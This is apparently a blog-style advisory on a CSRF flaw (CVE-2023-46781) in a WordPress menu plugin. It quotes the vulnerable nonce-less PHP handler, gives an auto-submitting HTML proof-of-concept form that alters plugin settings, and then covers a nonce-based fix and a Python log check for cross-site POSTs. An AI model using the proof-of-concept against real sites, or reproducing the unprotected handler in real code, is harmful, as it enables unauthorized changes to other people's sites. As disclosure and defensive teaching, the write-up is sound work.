CVE-2023-46781 - Cross-Site Request Forgery (CSRF) in Roland Murg Current Menu Item for Custom Post Types Plugin (<= 1.5) — Full Analysis & Exploit Details
CVE-2023-46781 refers to a Cross-Site Request Forgery (CSRF) vulnerability discovered in the WordPress plugin "Current Menu Item for Custom Post Types" by Roland Murg, affecting all versions up to and including 1.5. This vulnerability can let attackers trick logged-in WordPress users, including admins, into performing unwanted actions, which can compromise site security.
In this post, we’ll explain the vulnerability in simple terms, show code snippets, walk you through an exploitation scenario, and provide references for deeper study.
What is Cross-Site Request Forgery (CSRF)?
CSRF is a web security bug that targets authenticated users. If a website isn’t careful about validating requests, attackers can trick users into performing actions they didn’t intend — just by visiting a malicious link or page. Imagine you’re logged into your site, then you open a shady link. If the site doesn’t check for CSRF, the attacker’s page could make you change settings without your knowledge.
About the Plugin
The Current Menu Item for Custom Post Types plugin (WordPress.org page: https://wordpress.org/plugins/current-menu-item-for-custom-post-types/) helps you add a CSS class to menu items when using custom post types. It supports site nav menus and is popular for developers working with custom content.
Where’s the Vulnerability?
By analyzing the plugin code (version 1.5 and below), we find that options can be changed via HTTP POST requests without checks for a CSRF token (nonce). Here’s an example of the handler:
// Simplified version based on plugin's code
if (isset($_POST['rmcmcpt_save_options'])) {
update_option('rmcmcpt_option', $_POST['rmcmcpt_option']);
}
Problem? There’s no check_admin_referer() or *nonce* check to see if the request really comes from the WP admin interface. That means attackers can craft a form to submit unwanted changes when a logged-in admin visits a malicious page.
The attacker creates a website with the following HTML:
<!DOCTYPE html>
<html>
<body>
    <h1>Click Here for a Surprise!</h1>
    <form action="https://your-wordpress-site.com/wp-admin/options-general.php?page=rmcmcpt_settings" method="POST" id="csrfForm">
        <input type="hidden" name="rmcmcpt_option" value="malicious_value" />
        <input type="hidden" name="rmcmcpt_save_options" value="1" />
    </form>
    <script>
        // Auto-submit the form to launch the attack silently
        document.getElementById('csrfForm').submit();
    </script>
</body>
</html>
Note: The URL may be slightly different; adjust as needed based on your plugin's settings page.
The victim visits the attacker's page
If the victim is still logged into their WordPress dashboard in the same browser, and they visit the attacker's page, the form is automatically submitted in the background. It changes the plugin’s options as the attacker intended.
- Site Appearance: The wrong setting may cause menus to highlight incorrectly.
- Abuse: Attackers could set the plugin to broken or malicious values, causing confusion or hiding important menus.
How to Fix It?
Plugin Developers:
Add nonce verification for any options change. Here’s how a secure handler might look:
// Only save when the request carries a valid nonce issued for this action.
// check_admin_referer() stops the request (wp_die) if the nonce is missing or invalid.
// A nonce proves the request was intended from the admin UI; pair it with a
// capability check such as current_user_can('manage_options'), since a nonce does not prove authorization.
if (isset($_POST['rmcmcpt_save_options']) && check_admin_referer('rmcmcpt_options_save', 'rmcmcpt_nonce_field')) {
    update_option('rmcmcpt_option', $_POST['rmcmcpt_option']);
}
And don’t forget to add the matching nonce field to your HTML form:
<?php wp_nonce_field('rmcmcpt_options_save', 'rmcmcpt_nonce_field'); ?>
Site Owners:
Update the plugin as soon as a patch is available. If that isn’t possible, consider disabling it temporarily.
Look for unexpected POST requests to /wp-admin/options-general.php?page=rmcmcpt_settings in your web server access logs.
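As an added example (not part of the original post or the plugin's code), here is the log check that the site-owner advice describes, run over constructed Apache combined-format lines: it flags POSTs to the plugin settings page whose Referer is missing or belongs to another host, which is what a cross-site auto-submitted form produces. The site host and the attacker.example domain are constructed sample values.

```python
import re
from urllib.parse import urlparse

# Constructed Apache "combined" access-log lines (not real traffic).
# Line 1: legitimate save from the dashboard. Lines 2-3: cross-site form posts,
# one with a foreign Referer and one with no Referer. Line 4: a harmless GET.
SAMPLE_LOG = """\
203.0.113.10 - - [06/Nov/2023:12:20:01 +0000] "POST /wp-admin/options-general.php?page=rmcmcpt_settings HTTP/1.1" 302 0 "https://your-wordpress-site.com/wp-admin/options-general.php?page=rmcmcpt_settings" "Mozilla/5.0"
203.0.113.10 - - [06/Nov/2023:12:31:44 +0000] "POST /wp-admin/options-general.php?page=rmcmcpt_settings HTTP/1.1" 302 0 "https://attacker.example/surprise.html" "Mozilla/5.0"
203.0.113.10 - - [06/Nov/2023:12:32:02 +0000] "POST /wp-admin/options-general.php?page=rmcmcpt_settings HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Nov/2023:12:33:09 +0000] "GET /wp-admin/options-general.php?page=rmcmcpt_settings HTTP/1.1" 200 5120 "https://your-wordpress-site.com/wp-admin/" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

SETTINGS_PATH = "/wp-admin/options-general.php?page=rmcmcpt_settings"


def find_suspicious_saves(log_text, site_host):
    """Return (ip, timestamp, referer) for every POST to the plugin settings page
    whose Referer is absent ("-") or points at a host other than site_host.

    Caveat: Referer is a heuristic. Browsers and privacy extensions can strip it
    on legitimate requests, so hits are leads for triage, not proof of CSRF."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != SETTINGS_PATH:
            continue
        referer = m["referer"]
        referer_host = urlparse(referer).hostname if referer != "-" else None
        if referer_host != site_host:
            hits.append((m["ip"], m["ts"], referer))
    return hits


if __name__ == "__main__":
    for ip, ts, ref in find_suspicious_saves(SAMPLE_LOG, "your-wordpress-site.com"):
        print(f"{ts} {ip} POST to plugin settings page, referer {ref!r}")
```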
Conclusion
CVE-2023-46781 is a classic WordPress plugin CSRF: easy to exploit, avoidable with simple code checks, and potentially risky for admins. If you use the *Current Menu Item for Custom Post Types* plugin, check your version, and update immediately when fixed. In WordPress plugin development, always use nonces for admin actions. Stay secure!
_Disclaimer: This writeup is for educational purposes only. Don't exploit vulnerabilities on sites you don’t own._
Timeline
Published on: 11/06/2023 12:15:08 UTC
Last modified on: 11/14/2023 16:23:15 UTC